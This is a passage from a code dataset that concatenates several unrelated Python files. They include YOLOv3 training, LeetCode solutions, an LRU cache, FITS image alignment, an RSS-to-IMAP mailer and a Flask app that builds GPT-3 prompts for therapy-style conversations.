anchor_mask = [[3,4,5], [0,1,2]]\n \n else:\n model = Darknet_body(input_shape, num_anchors, num_classes)\n anchor_mask = [[6,7,8], [3,4,5], [0,1,2]]\n \n model.summary()\n \n xmls = os.listdir(annotation_path)\n total_train = len(xmls)\n \n print('train data:', total_train)\n print('anchors:', anchors)\n \n callbacks = [tf.keras.callbacks.ModelCheckpoint(filepath= log_dir + '/best_loss.h5',\n save_best_only=True,\n save_weights_only=True,\n monitor='loss',\n verbose=1)]\n \n loss = [YoLoLoss(input_shape, anchors[mask], classes=num_classes) for mask in anchor_mask]\n \n opt = tf.keras.optimizers.Adam()\n model.compile(optimizer=opt, loss=loss)\n \n model.fit(img_generator(xmls, annotation_path, batch_size, input_shape, anchors, anchor_mask, num_classes, is_tiny_version),\n steps_per_epoch = total_train//batch_size, callbacks=callbacks, epochs=200)\n\n model.save_weights(log_dir + '/finall.h5')\n\n#讀取類別,回傳類別List\ndef get_classes(classes_path):\n with open(classes_path) as f:\n class_name = f.readlines()\n class_name = [c.strip() for c in class_name]\n return class_name\n\n#讀取anchors\ndef get_anchors(anchors_path):\n with open(anchors_path) as f:\n anchors = f.readline()\n #str to float\n anchors = [float(x) for x in anchors.split(',')]\n #回傳[[w1,h1],....,[wn,hn]]形式\n return np.array(anchors).reshape(-1,2)\n\ndef img_generator(xml_name, ann_path, batch_size, input_shape, anchors, anchor_mask, num_classes, is_tiny_version):\n n = len(xml_name)\n i = 0\n while True:\n image_data = []\n box_data = []\n for r in range(batch_size):\n if i==0:\n np.random.shuffle(xml_name)\n image, box = load_data(ann_path + xml_name[i])\n image_data.append(image)\n box_data.append(box)\n i = (i+1) % n\n\n image_data = (np.array(image_data) / 255).astype(np.float32)\n box_data = np.array(box_data)\n y_true = preprocess_true_boxes(box_data, input_shape, anchors, anchor_mask, num_classes, tiny=is_tiny_version)\n \n yield (image_data, y_true)\n\n\n# In[6]:\n\nmain()\n\n\n\n","repo_name":"qwerasdf887/TF2_YOLOv3","sub_path":"train_on_xml.py","file_name":"train_on_xml.py","file_ext":"py","file_size_in_byte":3404,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"38214993969","text":"class Solution:\n def jump(self, nums: List[int]) -> int:\n jump_count = 0\n farest = 0\n current_idx = 0\n for i in range(len(nums)-1):\n farest = max(farest, i+nums[i])\n if i == current_idx:\n jump_count += 1\n current_idx = farest\n return jump_count\n\n\nclass Solution:\n def jump(self, nums: List[int]) -> int:\n n = len(nums)\n dp = [float(\"inf\")]*n\n dp[0] = 0\n for i in range(n):\n print(\"-----\", dp, i)\n for k in range(i+1, nums[i]+i+1):\n if k >= n:\n break\n dp[k] = min(dp[k], dp[i]+1)\n print(\"=====\", dp, k)\n return dp[n-1]\n","repo_name":"Chestermozhao/Notes","sub_path":"algorithms_practice/45.py","file_name":"45.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2793453117","text":"\"\"\"\n불량사용자 - DFS활용문제\n\n\"\"\"\ndef compare(char1, char2):\n # 길이 비교\n if len(char1) == len(char2):\n for k in range(len(char1)):\n # 문자 비교\n if not (char1[k] == char2[k] or char1[k] == \"*\" or char2[k] == \"*\"):\n return False\n else:\n return False\n return True\n\ndef DFS(depth):\n if depth == len(arr):\n res.append(\"\".join(sorted(tmp)))\n else:\n for num in arr[depth]:\n if num not in tmp:\n tmp.append(num)\n DFS(depth+1)\n tmp.pop()\n\ndef solution(user_id, banned_id):\n 
global answer, arr, tmp, res\n    answer = 0\n    tmp, res = [], []\n    arr = [[] for _ in range(len(banned_id))]\n\n    # 2중 for문으로 user_id와 banned_id를 비교함\n    for i in range(len(user_id)):\n        for j in range(len(banned_id)):\n            char1, char2 = user_id[i], banned_id[j]\n            if compare(char1, char2):\n                # arr의 j는 banned_id의 idx를 의미함\n                # arr[j]의 내부값은 user_id의 idx 의미함\n                arr[j].append(str(i))\n\n    DFS(0)\n    print(res)\n    return len(set(res))\n\n\nuser_id = [\"frodo\", \"fradi\", \"crodo\", \"abc123\", \"frodoc\"]\nbanned_id = [\"fr*d*\", \"*rodo\", \"******\", \"******\"]\nsolution(user_id, banned_id)","repo_name":"silverjjj/algorithm","sub_path":"Programmers/불량사용.py","file_name":"불량사용.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"14647395480","text":"\"\"\"Test Parameters.\"\"\"\nfrom collections import namedtuple\n\nimport factory  # type: ignore\n\n\nParameter = namedtuple(\"Parameter\", [\"name\", \"description\", \"type\", \"value\"])\n\napplication_environments = [\"dev\", \"dev2\", \"dev3\"]\napplication_names = [\"cloud-app\", \"another-app\"]\nvalue_types = [\"String\", \"SecureString\"]\n\n\nclass ParameterFactory(factory.Factory):  # type: ignore\n    \"\"\"Factory creating parameters.\"\"\"\n\n    class Meta:\n        \"\"\"Extra information for creation of parameters.\"\"\"\n\n        model = Parameter\n        exclude = (\n            \"environment_name\",\n            \"application_name\",\n            \"application_setting\",\n            \"test_value\",\n            \"faker\",\n        )\n\n    environment_name = factory.Faker(\"word\", ext_word_list=application_environments)\n    application_name = factory.Faker(\"word\", ext_word_list=application_names)\n    application_setting = factory.Faker(\"word\")\n    name = factory.LazyAttribute(\n        lambda n: \"/environments/%s/%s/%s\"\n        % (n.environment_name, n.application_name, n.application_setting)\n    )\n    description = factory.Faker(\"text\", max_nb_chars=60)\n    type = factory.Faker(\"word\", ext_word_list=value_types)\n    value = factory.Faker(\"pystr\")\n","repo_name":"nilsdebruin/pydantic-cloud-configuration","sub_path":"tests/parameters.py","file_name":"parameters.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"22437299170","text":"# Integer to Roman\r\n\r\n# Given an integer, convert it to a roman numeral.\r\n# Input is guaranteed to be within the range from 1 to 3999.\r\n\r\nclass Solution:\r\n    def intToRoman(self, num):\r\n        rules = [('I', 'V'), ('X', 'L'), ('C', 'D'), 'M']\r\n        result = ''\r\n        index = 0\r\n        while num > 0:\r\n            result = self.getExpression(num % 10, rules[index],\r\n                                        rules[index + 1] if index + 1 < len(rules) else None) + result\r\n            num = int(num / 10)\r\n            index += 1\r\n        return result\r\n\r\n    def getExpression(self, digit, rule, next_rule):\r\n        if digit <= 3:\r\n            return rule[0] * digit\r\n        elif digit == 4:\r\n            return rule[0] + rule[1]\r\n        elif 5 <= digit <= 8:\r\n            return rule[1] + rule[0] * (digit - 5)\r\n        elif digit == 9:\r\n            return rule[0] + next_rule[0]\r\n\r\n\r\nif __name__ == '__main__':\r\n    solution = Solution()\r\n    for i in range(1, 4000):\r\n        print('%d : %s' % (i, solution.intToRoman(i)))\r\n","repo_name":"MadSkittles/leetcode","sub_path":"12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"4531222711","text":"import requests\n\nurl = \"https://api.extremecloudiq.com/hiq/context\"\n\npayload=\"{\\n    \\\"reading_org_ids\\\": [\\n        1\\n    ],\\n    \\\"creating_org_id\\\": 1\\n}\"\nheaders = {\n  'Authorization': '***',\n  'Content-Type': 'application/json'\n}\n\nresponse = requests.request(\"PUT\", url, headers=headers, data=payload)\n\nprint(response.text)\n","repo_name":"sukhdeepjohar/ExtremeCloudIQ-APIs","sub_path":"XIQ API Python collection/HIQ/Set HIQ context.py","file_name":"Set HIQ context.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"}
{"seq_id":"24636775124","text":"#!/bin/env python\n\nimport json\nimport sys\nimport urllib\n\nfrom basicplib.util.timeutil import curr_time_int as current_time\n\n\nSECOND = 1\nMINUTE = 60\nHOUR = 3600\nDAY = 86400\n\n\nclass Node(object):\n    def __init__(self, key, val):\n        self.key = key\n        self.val = val\n        self.age = current_time()\n        self.next = None\n        self.prev = None\n        self.size = sys.getsizeof(val)\n    \n    def details(self, include_value=False):\n        detail = {\n            'key': self.key,\n            'bust': urllib.urlencode({'key': self.key}),\n            'age': current_time() - self.age\n        }\n        if include_value:\n            detail['val'] = self.val\n        return detail\n\n\nclass Cache(object):\n    def __init__(self, max_items=100, max_age=-1, max_size=-1, **kwargs):\n        self.max_items = max_items\n        self.max_age = max_age\n        self.max_size = max_size\n        self.size = 0\n        self.clear()\n        self.cache = {}\n        self.head = None\n        self.tail = None\n\n    def clear(self):\n        self.cache = {}\n        self.head = None\n        self.tail = None\n    \n    def contains(self, key):\n        return self.cache.has_key(key)\n    \n    def details(self, include_values=False):\n        keys = []\n        current = self.head\n        while current:\n            keys.append(current.details(include_values))\n            current = current.next\n\n        return json.dumps({\n            'count': len(self.cache),\n            'size': self.size,\n            'max_size': self.max_size,\n            'max_items': self.max_items,\n            'max_age': self.max_age,\n            'keys': keys\n        })\n\n    def get(self, key):\n        obj = self.cache.get(key)\n        if obj:\n            if self.max_age < 0 or obj.age + self.max_age >= current_time():\n                self.put(key, obj.val)\n                return obj.val\n            self.remove(key)\n        return None\n\n    def put(self, key, val):\n        if self.contains(key):\n            self.remove(key)\n        obj = Node(key, val)\n        self.size += obj.size\n        self.cache[key] = obj\n\n        if self.head:\n            obj.next = self.head\n            self.head.prev = obj\n        self.head = obj\n\n        if not self.tail:\n            self.tail = obj\n\n        # check max items constraint\n        if self.max_items > 0 and len(self.cache) > self.max_items:\n            self.remove(self.tail.key)\n\n        # check max_size constraint\n        while self.max_size > 0 and self.size > self.max_size:\n            self.remove(self.tail.key)\n\n    def remove(self, key):\n        if self.contains(key):\n            obj = self.cache[key]\n            if obj.prev:\n                obj.prev.next = obj.next\n            else:\n                self.head = obj.next\n            if obj.next:\n                obj.next.prev = obj.prev\n            else:\n                self.tail = obj.prev\n            self.size -= obj.size\n            del self.cache[key]\n","repo_name":"typd/basicplib","sub_path":"basicplib/util/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":2942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"12977174483","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Dec 26 19:07:26 2018\r\n\r\n@author: Mikołaj\r\n\"\"\"\r\n\r\nfrom __future__ import print_function\r\nimport cv2\r\nimport numpy as np\r\nfrom astropy.io import fits\r\nimport time\r\nimport os,re\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.colors import 
LogNorm\r\nimport math\r\nfrom scipy import ndimage\r\n\r\nMAX_FEATURES = 1000\r\nGOOD_MATCH_PERCENT = 0.15\r\n \r\n \r\ndef alignImages(im1, im2):\r\n \r\n # Convert images to grayscale\r\n #im1Gray = cv2.cvtColor(im1, cv2.COLOR_BGR2GRAY)\r\n #im2Gray = cv2.cvtColor(im2, cv2.COLOR_BGR2GRAY)\r\n im1Gray=cv2.cvtColor(im1,cv2.COLOR_GRAY2RGB)\r\n im2Gray=cv2.cvtColor(im2,cv2.COLOR_GRAY2RGB) \r\n # Detect ORB features and compute descriptors.\r\n orb = cv2.ORB_create(MAX_FEATURES)\r\n keypoints1, descriptors1 = orb.detectAndCompute(im1Gray, None)\r\n keypoints2, descriptors2 = orb.detectAndCompute(im2Gray, None)\r\n \r\n # Match features.\r\n matcher = cv2.DescriptorMatcher_create(cv2.DESCRIPTOR_MATCHER_BRUTEFORCE_HAMMING)\r\n matches = matcher.match(descriptors1, descriptors2, None)\r\n \r\n # Sort matches by score\r\n matches.sort(key=lambda x: x.distance, reverse=False)\r\n \r\n # Remove not so good matches\r\n numGoodMatches = int(len(matches) * GOOD_MATCH_PERCENT)\r\n matches = matches[:numGoodMatches]\r\n #print(len(matches))\r\n # Draw top matches\r\n imMatches = cv2.drawMatches(im1, keypoints1, im2, keypoints2, matches, None)\r\n cv2.imwrite(\"matches.jpg\", imMatches)\r\n \r\n # Extract location of good matches\r\n points1 = np.zeros((len(matches), 2), dtype=np.float32)\r\n points2 = np.zeros((len(matches), 2), dtype=np.float32)\r\n \r\n for i, match in enumerate(matches):\r\n points1[i, :] = keypoints1[match.queryIdx].pt\r\n points2[i, :] = keypoints2[match.trainIdx].pt\r\n \r\n # Find homography\r\n h, mask = cv2.findHomography(points1, points2, cv2.RANSAC)\r\n \r\n # Use homography\r\n height, width = im2.shape\r\n im1Reg = cv2.warpPerspective(im1, h, (width, height))\r\n \r\n return im1Reg, h\r\n \r\n \r\nif __name__ == '__main__':\r\n \r\n for i in range(1,7):\r\n files = [f for f in os.listdir('E:\\\\DyskGoogle\\\\TSC90_POL\\\\20181018\\\\BD+64106_src') if re.match(r'.*-00'+str(i)+'-p.r.fit', f)]\r\n print(files) \r\n \r\n \r\n # Read reference image\r\n refFilename = \"BD+64106-006-p1r.fit\"\r\n print(\"Reading reference image : \", refFilename)\r\n imReference = fits.open(refFilename)[0].data#.imread(refFilename, cv2.IMREAD_COLOR)\r\n '''\r\n plt.figure()\r\n plt.imshow(imReference,cmap=plt.cm.gray_r, norm=LogNorm())\r\n plt.title(refFilename)\r\n plt.colorbar()\r\n plt.xlabel('pixel')\r\n plt.ylabel('pixel')\r\n '''\r\n # Read image to be aligned\r\n imFilename = \"BD+64106-006-p3r.fit\"\r\n print(\"Reading image to align : \", imFilename); \r\n im = fits.open(imFilename)[0].data#cv2.imread(imFilename, cv2.IMREAD_COLOR)\r\n '''\r\n plt.figure()\r\n plt.imshow(im,cmap=plt.cm.gray_r, norm=LogNorm())\r\n plt.title(refFilename)\r\n plt.colorbar()\r\n plt.xlabel('pixel')\r\n plt.ylabel('pixel')\r\n '''\r\n hdu=imReference\r\n ma=hdu.max()\r\n mi=hdu.min()\r\n image = np.array(hdu, copy=True)\r\n '''image.clip(mi,ma, out=image)\r\n image -=mi\r\n image //= (ma - mi + 1) / 255.\r\n '''\r\n im=image.astype(np.uint8)\r\n im=cv2.medianBlur(im,5)\r\n th = cv2.adaptiveThreshold(im, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 115, 0)\r\n cv2.bitwise_not(th,th)\r\n # cv2.adaptiveThreshold()\r\n fig=plt.figure()\r\n plt.imshow(th,cmap=plt.cm.gray_r,norm=LogNorm())\r\n #img_edges = cv2.Canny(th,127,1000)\r\n #plt.imshow(img_edges,cmap=plt.cm.gray_r,norm=LogNorm())\r\n '''\r\n lines = cv2.HoughLinesP(img_edges, 1, math.pi / 180.0, 30)\r\n for line in lines:\r\n x1, y1, x2, y2 = line[0]\r\n cv2.line(im, (x1, y1), (x2, y2), (0, 255, 0), 3)\r\n '''\r\n #cv2.imshow(\"Edges\", 
img_edges)\r\n #cv2.imshow(\"Image\", im)\r\n \r\n im2=np.array(fits.open(imFilename)[0].data,copy=True)\r\n #im2min=fits.open(imFilename)[0].data.min()\r\n #im2max=fits.open(imFilename)[0].data.max()\r\n #im2.clip(min=im2min,max=im2max,out=im2)\r\n im2=im2.astype(np.uint8)\r\n \r\n im2=cv2.medianBlur(im2,5)\r\n th = cv2.adaptiveThreshold(im2, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 115, 0)\r\n cv2.bitwise_not(th,th)\r\n \r\n fig=plt.figure()\r\n plt.imshow(th,cmap=plt.cm.gray_r)\r\n im2_edges = cv2.Canny(th,127,1000)\r\n #fig=plt.figure()\r\n #plt.imshow(im2_edges,cmap=plt.cm.gray_r,norm=LogNorm())\r\n '''\r\n lines2 = cv2.HoughLinesP(im2_edges, 1, np.pi / 180.0, 30)\r\n for line in lines2:\r\n x1, y1, x2, y2 = line[0]\r\n cv2.line(im2, (x1, y1), (x2, y2), (0, 255, 0), 3)\r\n for line in lines:\r\n x1, y1, x2, y2 = line[0]\r\n \r\n cv2.line(im, (x1, y1), (x2, y2), (0, 255, 0), 3)\r\n '''\r\n #cv2.imshow(\"Edges\", im2_edges)\r\n #cv2.imshow(\"Image\", im2) \r\n '''\r\n fig, ax = plt.subplots(2, 1, sharex='col', sharey='row')\r\n ax[0].imshow(im,cmap=plt.cm.gray_r, norm=LogNorm())\r\n ax[1].imshow(im2,cmap=plt.cm.gray_r, norm=LogNorm())\r\n plt.title(refFilename)\r\n #fig.colorbar()\r\n plt.xlabel('pixel')\r\n plt.ylabel('pixel')\r\n \r\n \r\n plt.figure()\r\n plt.imshow(img_edges,cmap=plt.cm.gray_r, norm=LogNorm())\r\n plt.title(refFilename)\r\n plt.colorbar()\r\n plt.xlabel('pixel')\r\n plt.ylabel('pixel')\r\n '''\r\n print(\"Aligning images ...\")\r\n # Registered image will be resotred in imReg. \r\n # The estimated homography will be stored in h. \r\n imReg, h = alignImages(im2,im)\r\n \r\n # Write aligned image to disk. \r\n #outFilename = \"aligned.jpg\"\r\n #print(\"Saving aligned image : \", outFilename); \r\n #cv2.imwrite(outFilename, imReg)\r\n \r\n # Print estimated homography\r\n #print(\"Estimated homography : \\n\", h)\r\n theta=-math.atan2(float(h[0,1]),float(h[0,0]))\r\n print(theta*180.0/math.pi)\r\n \r\n # cv2.waitKey(0)\r\n #cv2.destroyAllWindows()","repo_name":"mkarawacki/SavartPlateRotationCalc-CV","sub_path":"HomographyOpenCV.py","file_name":"HomographyOpenCV.py","file_ext":"py","file_size_in_byte":5664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7318151544","text":"import hashlib\nimport os \nfrom datetime import datetime\nimport html\nimport time \n\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.base import MIMEBase \nfrom email.mime.application import MIMEApplication \nfrom email.mime.text import MIMEText\nimport email.encoders as Encoders\nfrom email.header import Header \nfrom email.utils import formataddr\n\nimport sys\nimport json\nimport glob\n\nfrom os.path import basename\n\n### --- Les classes pour notre script principal\nfrom _debug import DebugAff\nfrom _messagerie import Messagerie \nfrom _message import Message \nfrom _recuperateur import Recuperateur \n\n\n### --- Récupération de la liste des flux \ntry:\n fluxRSS = []\n with open(\"./liste.flux\",\"r\") as f:\n for l in f:\n fluxRSS.append(l.rstrip('\\n\\r'))\n f.close()\n if len(fluxRSS)==0:\n raise Exception(\"... 
la liste des flux est vide !\") \nexcept:\n DebugAff(99,\"ERREUR / impossible de récupérer la liste des flux\") \n sys.exit()\n\n\n\n### --- Récupération de la liste des messageries \ntry:\n messageries = []\n with open(\"./liste.messageries\",\"r\") as f:\n for l in f: \n try: \n messageries.append(json.loads(l.rstrip('\\n\\r')))\n except:\n pass \n f.close()\n if len(messageries)==0:\n raise Exception(\"... la liste des messageries est vide !\") \nexcept:\n DebugAff(99,\"ERREUR / impossible de récupérer la liste des messageries\") \n sys.exit() \n\n\n### --- Association des comptes de messagerie à des objets de connexion \nconnections = []\nfor m in messageries:\n connections.append(\n Messagerie(m)\n ) \n\n### --- Fonction pour faire la correspondance flux / messagerie\ndef Correspondance(dossier_travail,entrees_index,threadFlux,connexion):\n try:\n connexion.connecter()\n for entree in entrees_index:\n entree_id = basename(entree).split(\".\")[0]\n try:\n with open(\".\"+threadFlux.flux_dossier+\"/\"+entree_id+\".article\",\"r\") as article_fichier:\n article = article_fichier.read() \n article_fichier.close()\n except Exception as e:\n DebugAff(0,\"-- Un item sans article en cache... \"+threadFlux.flux_dossier+\"/\"+entree_id+\".article : \"+str(e)) \n article = \"\" \n if not os.path.exists(dossier_travail+\"/\"+entree_id):\n entree_elements = json.loads(open(entree,\"r\").read()) \n date = datetime.strptime(\n entree_elements[\"published\"],\n \"%a, %d %b %Y %H:%M:%S %z\"\n ).timestamp() \n if connexion.ajouter(\n Message({\n \"flux_id\": threadFlux.flux_md5, \n \"flux_titre\": threadFlux.titre, \n \"sujet\": entree_elements[\"title\"],\n \"destinataire\": connexion.adresse, \n \"article\": article, \n \"entree\": entree_elements \n }).msg,\n date \n )==\"OK\": \n with open(dossier_travail+\"/\"+entree_id,\"w\"):\n pass \n connexion.deconnecter()\n except Exception as e:\n DebugAff(10,\"ERREUR / lors de la correspondance : \"+str(e)) \n\n### --- Conservation des threads \nfluxRSSThreads = []\n\n### --- Lancement des threads pour les boucles de récupération\n### --- --- ... d'abord les threads de récupération de flux \ntry: \n for flux in fluxRSS: \n DebugAff(0,\"-- Lancement du Thread pour le flux \"+flux) \n _thread = Recuperateur(flux)\n _thread.start()\n time.sleep(1) \n fluxRSSThreads.append(_thread)\n time.sleep(1) \nexcept Exception as e:\n DebugAff(99,\"ERREUR / lors du lancement des threads pour la récupération des flux : \"+str(e))\n\nDebugAff(0,\"-- Fin de lancement des threads\") \n\n### --- --- ... 
enfin la boucle pour que le script \"main\" ne s'arrête pas\n_boucle = True \nwhile True:\n try: \n for threadFlux in fluxRSSThreads:\n entrees_index = glob.glob(\".\"+threadFlux.flux_dossier+\"/*.index\") \n## print(\"--------------\") \n## print(threadFlux.flux) \n## print(threadFlux.flux_dossier) \n## print(entrees_index)\n for connexion in connections: \n dossier_travail = connexion.dossier+threadFlux.flux_dossier\n if os.path.exists(dossier_travail):\n Correspondance(\n dossier_travail, \n entrees_index,\n threadFlux,\n connexion \n )\n time.sleep(60*7) \n except Exception as e:\n DebugAff(99,\"ERREUR / lors de l'enregistrement des flux dans les messageries : \"+str(e)) \n _boucle = False \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n## #\n##\n##\n##\n##\n##\n##\n## \n## try:\n## for f in fluxRSS:\n## f_dossier = hashlib.md5(f.encode(\"utf8\")).hexdigest()\n## f_contenus = feedparser.parse(f)\n## f_tmp = [] \n## for f_entree in f_contenus[\"entries\"]:\n## f_id = hashlib.md5(f_entree[\"id\"].encode(\"utf8\")).hexdigest()\n## f_date_courriel = datetime.strptime(f_entree[\"published\"],\"%a, %d %b %Y %H:%M:%S %z\")\n## f_pj = urllib.request.urlopen(f_entree[\"id\"]).read()\n## f_fichier = f_dossier+\"/\"+f_id\n## \n## f_tmp.append({\n## \"date\": f_date_courriel,\n## \"pj\": f_pj,\n## \"id\": f_id,\n## \"fichier\": f_fichier,\n## \"contenu\": f_entree,\n## \"msg\": msg \n## })\n## \n## for c in connections:\n## print(c.adresse+\" / \"+c.dossier)\n## print(\"./\"+c.dossier+\"/\"+f_dossier)\n## if not os.path.exists(\"./\"+c.dossier):\n## os.mkdir(\"./\"+c.dossier) \n## if os.path.exists(\"./\"+c.dossier+\"/\"+f_dossier):\n## print(\"! D'accord pour recevoir ce flux\") \n## c.connecter() \n## for msg_tmp in f_tmp:\n## print(\"--tentative d'ajout d'un message \"+msg_tmp[\"contenu\"][\"title\"]) \n## msg_tmp[\"msg\"]['To'] = c.adresse \n## try:\n## with open(\"./\"+c.dossier+\"/\"+f_dossier+\"/\"+msg_tmp[\"id\"],\"r\"):\n## print(\"... message déjà existant\") \n## except IOError:\n## if c.ajouter(\n## msg_tmp[\"msg\"],\n## msg_tmp[\"date\"].timestamp() \n## )==\"OK\":\n## with open(\"./\"+c.dossier+\"/\"+f_dossier+\"/\"+msg_tmp[\"id\"],\"w\"):\n## print(\"... message ajouté\")\n## else:\n## print(\"... erreur lors de l'enregistrement dans la boîte, pas de nouvelle tentative\") \n## c.deconnecter()\n## else:\n## print(\"! 
Pas d'accord pour recevoir ce flux\") \n## except Exception as e:\n## print(\"ERR / \"+str(e)) \n## print(\"fin et pause...\") \n## time.sleep(20)\n##\n##\n","repo_name":"JGarderon/RssImap","sub_path":"imap.py","file_name":"imap.py","file_ext":"py","file_size_in_byte":7395,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39862546193","text":"\"\"\"\nA social experiment to see if people can discern humans from AIs.\n\"\"\"\n\n\n\n\n# Start with a basic flask app webpage.\nfrom flask_socketio import SocketIO, emit\nfrom flask import Flask, render_template, url_for, copy_current_request_context\nfrom random import random\nfrom time import sleep\nfrom threading import Thread, Event\nfrom transformers import GPT2Tokenizer\nfrom key_config import *\nimport openai\nimport os\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = flask_secret_key\napp.config['DEBUG'] = True\n\n#turn the flask app into a socketio app\nsocketio = SocketIO(app, async_mode=None, logger=True, engineio_logger=True, cors_allowed_origins=\"http://127.0.0.1:5000\")\n\n#random number Generator Thread\nthread = Thread()\nthread_stop_event = Event()\n\n\n@app.route('/')\ndef index():\n #only by sending this page first will the client be connected to the socketio instance\n return render_template('index.html')\n\n@socketio.on('connect', namespace='/test')\ndef test_connect():\n # need visibility of the global thread object\n global thread\n print('Client connected')\n\n@socketio.on('disconnect', namespace='/test')\ndef test_disconnect():\n print('Client disconnected')\n\ntokenizer = GPT2Tokenizer.from_pretrained(\"gpt2\")\n\nrecommendation_config = [\n {\n \"Human\": [\"Hi, I'm Jack. I'm having a hard time getting out of my comfort zone\", \"I think it's important to get out of my comfort zone so that I can continue to learn. For example, last night, I wanted to talk to some new people, but was afraid to, so I just talked with people I already knew.\", \"Because I'm afraid of being weird and leaving a bad first impression\", \"I'm not sure how often, but usually in social situations I tend not to introduce myself or start new conversations with people\", \"Because I think I'm afraid of embarrassing myself, or that they won't like me\", \"I'm not sure yet, I think I need to step outside my comfort zone\"],\n \"AI\": [\"Why is it important to get out of your comfort zone? Can you give me a specific example of how you stayed in your comfort zone?\",\"Why were you afraid to talk with new people?\", \"Do you often feel like that?\", \"Why do you think that is?\", \"And how do you usually correct this?\"],\n \"Recommendation\": \"The only way to grow is to step outside your comfort zone. So why don't you try something small like small talk with an acquaintance, and then become more comfortable talking to new people. 
That way you can eventually build up the skills to talk with strangers.\"\n },\n {\n \"Human\": [\"I've been dealing with relationship issues recently\", \"It has been painful\", \"Well its hard to communicate with my girlfriend because she can be very demanding.\", \"She doesn't fully listen to my opinion, and assumes that we should always do what she wants to do\", \"I think it should be a compromise, and/or we work towards finding the right solution together\", \"She usually just gets mad at me, and then I have to be defensive or let her win the argument\", \"I feel like I'm not able to be myself and have to let her run all over me\", \"That I'm able to have my opinions, do what I want, and pursue my own passions without being burdened by the desires of someone else\", \"I would love to build my own projects, hang out with friends, do stupid/weird things. I think I'm a naturally goofy type, fun loving character and I wish I could explore that side of myself more\"],\n \"AI\": [\"Okay, how has this affected you?\",\"How have these difficulties manifested?\", \"How does she come across to be demanding?\", \"What are your expectations for how your partner should behave towards you?\", \"What have past conflicts with this person been like?\", \"How does this situation make you feel?\", \"What would being yourself mean?\", \"What did you do on your own? What kinds of things do you like to do?\"],\n \"Recommendation\": \"Have you tried talking with her honestly about being able to voice your opinion? It's important to stand up for yourself as well as not bend to the will of others. If she's unwilling to let you voice or listen to your opinion, it may make sense to leave the relationship.\"\n },\n {\n \"Human\": [\"I'm trying to become a better friend\", \"Why so that I can build stronger relationships with people. Its important for us humans to connect\", \"I need to be more comfortable reaching out to people\", \"I think it starts by reaching out! I think once I try it a few times, it will become easier\", \"I hope so\", \"I will try\"],\n \"AI\": [\"Okay… Why? And who?\", \"I think that is an admirable goal. What skills do you need to become a better friend?\", \"What can you do to be more comfortable?\", \"Do you think you can fulfill this role?\", \"Should I be concerned that you hope so? Maybe you should try first?\"],\n \"Recommendation\": \"Reaching out to people isn't easy at first. Don't be discouraged, and lower your expectations on yourself. 
Try by saying 'hi' to someone new.\"\n },\n {\n \"Human\": [],\n \"AI\": [],\n \"Recommendation\": \"\"\n }\n]\n\n\n\n\ndef create_summary_dict ():\n summary_dict = {\n 'Current Summary': \"\",\n 'Prompt': \"\",\n 'Text': \"\",\n 'New Summary': \"\"\n }\n return summary_dict\n\ndef create_response_dict ():\n response_dict = {\n 'Current Summary': \"\",\n 'Text': \"\",\n 'Response': \"\"\n }\n return response_dict\n\ndef create_question_dict ():\n question_dict = {\n 'Text': \"\",\n 'Response': \"\",\n 'Question': \"\"\n }\n return question_dict\n\ndef generate_recommendation_prompt(config):\n end_token = \"\\n###\\n\\n\"\n response_prompt = ''\n\n generated_prompt = \"Generate recommended next steps based on a therapy conversation.\\n\\n###\\n\\n\"\n for r in config:\n larger_num = max(len(r['Human']), len(r['AI']))\n\n gen_text = ''\n for i in range(0, larger_num):\n\n if i+1 > len(r['Human']):\n msg = ''\n else:\n msg = 'Human: ' + r['Human'][i]\n\n if i+1 > len(r['AI']):\n response = ''\n else:\n response = 'AI: ' + r['AI'][i]\n gen_text = gen_text + msg + '\\n' + response + '\\n'\n\n recommendation = 'Recommendation: ' + r['Recommendation'] + '\\n'\n response_prompt = response_prompt + gen_text + recommendation + end_token\n\n generated_prompt = generated_prompt + response_prompt\n\n\n generated_prompt = generated_prompt.rstrip().rstrip('###').rstrip()\n return generated_prompt\n\n#call summary api\ndef call_summary_api(the_prompt):\n #update values\n response = openai.Completion.create(\n engine=\"davinci\",\n prompt = the_prompt,\n max_tokens=700,\n temperature=.5,\n #top_p=1, #Don't use both this and temp (according to OpenAI docs)\n frequency_penalty=0.2,\n presence_penalty=0.0,\n n=1,\n stream = None,\n logprobs=None,\n stop = [\"\\n\"])\n\n return (response)\n\n#call api\ndef call_response_api(the_prompt):\n #update values\n response = openai.Completion.create(\n engine=\"davinci\",\n prompt = the_prompt,\n max_tokens=400,\n temperature=.7,\n #top_p=1, #Don't use both this and temp (according to OpenAI docs)\n frequency_penalty=0.2,\n presence_penalty=0.0,\n n=1,\n stream = None,\n logprobs=None,\n logit_bias={30:1},\n stop = [\"\\n\"])\n\n return (response)\n\n#call api\ndef call_question_api(the_prompt):\n #update values\n response = openai.Completion.create(\n engine=\"davinci\",\n prompt = the_prompt,\n max_tokens=400,\n temperature=.7,\n #top_p=1, #Don't use both this and temp (according to OpenAI docs)\n frequency_penalty=0.2,\n 